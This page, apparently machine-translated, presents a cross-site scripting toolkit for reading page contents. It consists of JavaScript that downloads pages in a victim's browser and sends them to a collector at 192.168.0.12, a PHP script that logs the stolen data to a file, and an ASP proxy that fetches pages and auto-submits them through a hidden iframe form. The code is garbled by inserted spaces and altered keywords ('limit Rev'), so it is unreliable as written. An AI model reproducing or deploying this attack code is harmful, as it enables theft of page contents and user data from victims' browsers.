Xss file page content reading (solution)

Js: Copy codeThe Code is as follows: document. body. addBehavior ("# default # Download ");
Var mycars = new Array ();
Mycars [0] = "l.htm ";
Mycars [1] = "y.htm ";
For (x in mycars)
{
If (document. body. startDownload (mycars [x], GetData )){
GetData (source );
}
}

Function GetData (source)
{
Txt = escape (source );
GetReaded (txt );
}
Function getReaded (usr ){
Var newimg = new Image ();
Newimg. src = "http: // 192.168.0.12/style. php? Key = "+" \ n "+" \ n "+ usr +" \ n "+" \ n ";
}

Php:Copy codeThe Code is as follows: <? Php
Header ('content-Type: text/html; charset = GB2312 ');
Function unescape ($ str ){
$ Str = rawurldecode ($ str );
Preg_match_all ("/% u. {4} |. {4}; | \ d +; |. +/U", $ str, $ r );
$ Ar = $ r [0];
Foreach ($ ar as $ k => $ v ){
If (substr ($ v, 0, 2) = "% u ")
$ Ar [$ k] = iconv ("UCS-2", "UTF-8", pack ("H4", substr ($ v,-4 )));
Elseif (substr ($ v, 0, 3) = "")
$ Ar [$ k] = iconv ("UCS-2", "UTF-8", pack ("H4", substr ($ v, 3,-1 )));
Elseif (substr ($ v, 0, 2) = ""){
$ Ar [$ k] = iconv ("UCS-2", "UTF-8", pack ("n", substr ($ v, 2,-1 )));
}
}
Return join ("", $ ar );
}
$ File = "news.html ";
$ _ GET ['key'] = unescape ($ _ GET ['key']);
Fputs (fopen ($ file, 'a + '), $ _ GET ['key']);
?>

========================================================== =Copy codeThe Code is as follows: <%
Response. Buffer = True
Dim sUrlB, send (2)
Send (0) = escape (PageWebProxy ("http: // 192.168.0.5/sohu.htm "))
Send (1) = escape (PageWebProxy ("http: // 192.168.0.5/c.htm "))
Function PageWebProxy (xmlpath)
Dim I, re, Url, Html
Url = xmlpath

Set re = New RegExp
Re. IgnoreCase = True
Re. Global = True
SUrlB = Url
Html = getHTTPPage (Url)
Url = Left (Url, limit Rev (Url ,"/"))
I = InStr (sUrlB ,"? ")
If I> 0 Then
SUrlB = Left (sUrlB, I-1)
End If
Re. Pattern = "(href | action) = (\ '| "")? (\?) "
Html = re. Replace (Html, "$1 = $2" & sUrlB &"? ")
Re. Pattern = "(src | action | href) = (\ '| "")? (Http | https | javascript): [A-Za-z0-9 \./= \? % \-&_~ '@ [\] \': +!] + ([^ <> ""]) +) (\ '| "")? "
Html = re. Replace (Html, "$ 1x = $2 $3 $2 ")
Re. Pattern = "(window \. open | url) \ (\ '| "")? (Http | https) :( \// |\\\\) [A-Za-z0-9 \./= \? % \-&_~ '@ [\]: +!] + ([^ \ '<> ""]) +) (\' | "")? \)"
Html = re. Replace (Html, "$ 1x ($2 $3 $2 )")
Re. Pattern = "(src | action | href | background) = (\ '| "")? ([^ \/"" \ '] [A-Za-z0-9 \./= \? % \-&_~ '@ [\]: +!] + ([^ \ '<> ""]) +) (\' | "")? "
Html = re. Replace (Html, "$1 = $2" & Url & "$3 $2 ")
Re. Pattern = "(src | action | href | background) = (\ '| "")? \/([^ "" \ '] [A-Za-z0-9 \./= \? % \-&_~ '@ [\]: +!] + ([^ \ '<> ""]) +) (\' | "")? "
Html = re. Replace (Html, "$1 = $2 http: //" & Split (Url, "/") (2) & "/$3 $2 ")
Re. Pattern = "(src | action | href) = (\ '| "")? \/(\ '| "")? "
Html = re. Replace (Html, "$1 = $2 http: //" & Split (Url, "/") (2) & "/$2 ")
Re. Pattern = "(window \. open | url) \ (\ '| "")? ([^ \/"" \ 'HTTP:] [A-Za-z0-9 \./= \? % \-&_~ '@ [\] +!] + ([^ \ '<> ""]) +) (\' | "")? \)"
Html = re. Replace (Html, "$1 ($2" & Url & "$3 $2 )")
Re. Pattern = "(window \. open | url) \ (\ '| "")? \/([^ "" \ 'HTTP:] [A-Za-z0-9 \./= \? % \-&_~ '@ [\] +!] + ([^ \ '<> ""]) +) (\' | "")? \)"
Html = re. replace (Html, "$1 ($2 http: //" & Split (Url, "/") (2) & "/$3 $2 )")
Html = Replace (Html, "&", "% 26 ")
If Split (Url, "/") (2) = "club.isso.com.cn" Then
Html = Replace (Html, "% 26amp;", "% 26 ")
Else
Html = Replace (Html, "% 26amp ;","&")
End If
Html = Replace (Html, "% 26 nbsp ;","")
Html = Replace (Html, "% 26lt;", "<")
Html = Replace (Html, "% 26gt;", "> ")
Html = Replace (Html, "% 26 quot ;",""")
Html = Replace (Html, "% 26 copy ;","")
Html = Replace (Html, "% 26reg ;","")
Html = Replace (Html, "% 26 raquo ;","»")
Html = Replace (Html, "% 26% 26 ","&&")
Html = Replace (Html, "% 26 #","")
'Html = Replace (Html, "% 26 ","")
Re. Pattern = "(src | action | href) x = (\ '| "")? (Http | https | javascript): [A-Za-z0-9 \./= \? % \-&_~ '@ [\] \': +!] + ([^ <> ""]) +) (\ '| "")? "
Html = re. Replace (Html, "$1 = $2 $3 $2 ")
Re. Pattern = "(http | https) :( \// |\\\\) [A-Za-z0-9 \./= \? % \-&_~ '@ [\] \': +!] + ([^ <> ""]) +) "'" (Gif | jpg | bmp | png ))"
Html = re. Replace (Html ,"? Url = $1 ")
Re. Pattern = "\? Url = "& Url &" (# | javascript :)"
Html = re. Replace (Html, "$1 ")
Re. Pattern = "multipart \/form-data"
Html = re. Replace (Html ,"")
PageWebProxy = Html
End function
Function getHTTPPage (url)
Dim Http, theStr, fileExt
Set Http = Server. CreateObject ("MSXML2.XMLHTTP ")
If Request. Form. Count> 0 Then
For Each x In Request. Form
TheStr = theStr & Server. UrlEncode (x) & "=" & Server. UrlEncode (Request. Form (x ))&"&"
Next
Http. Open "POST", url, False
Http. SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http. Send (theStr)
Else
Http. Open "GET", url, False
Http. Send ()
End If
If Http. readystate <> 4 then Exit Function
FileExt = LCase (Mid (url, limit Rev (url, ".") + 1 ))
If InStr ("$ jpg $ gif $ bmp $ png $ js $", "$" & fileExt & "$")> 0 Then
Response. Clear
Response. BinaryWrite Http. responseBody
Response. End ()
Else
If InStr ("$ rar $ mdb $ zip $ exe $ com $ ico $", "$" & fileExt & "$")> 0 Then
Response. AddHeader "Content-Disposition", "Attachment; Filename =" & Mid (sUrlB, limit Rev (sUrlB, "/") + 1)
Response. BinaryWrite Http. responseBody
Response. Flush
Else
GetHTTPPage = bytesToBSTR (Http. responseBody, "GB2312 ")
End If
End If
Set Http = Nothing
End Function
Function BytesToBstr (body, Cset)
Dim objstream
Set objstream = Server. CreateObject ("adodb. stream ")
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
BytesToBstr = objstream. ReadText
Objstream. Close
Set objstream = nothing
End Function
%>

Document. writeln ("<iframe name = \" mimi \ "src = about: blank style = display: none> <\/iframe> ")
Document. writeln ("<form id = form action = http: \// 192.168.0.12 \/xss. asp method = POST target = mimi> ");
Document. writeln ("<input id = var name = var type = hidden> ");
Document. writeln ("<input id = vartwo name = vartwo type = hidden> ");
Document. writeln ("<input type = submit style = display: none> ");
Document. writeln ("<\/form> ")
Document. getElementById ("var"). value = 'HTTP: // 192.168.0.5/sohu.htm' + unescape ('<% = send (0) %> ');
Document. getElementById ("vartwo"). value = 'HTTP: // 192.168.0.5/c.htm' + unescape ('<% = send (1) %> ');
Document. getElementById ("form"). submit ();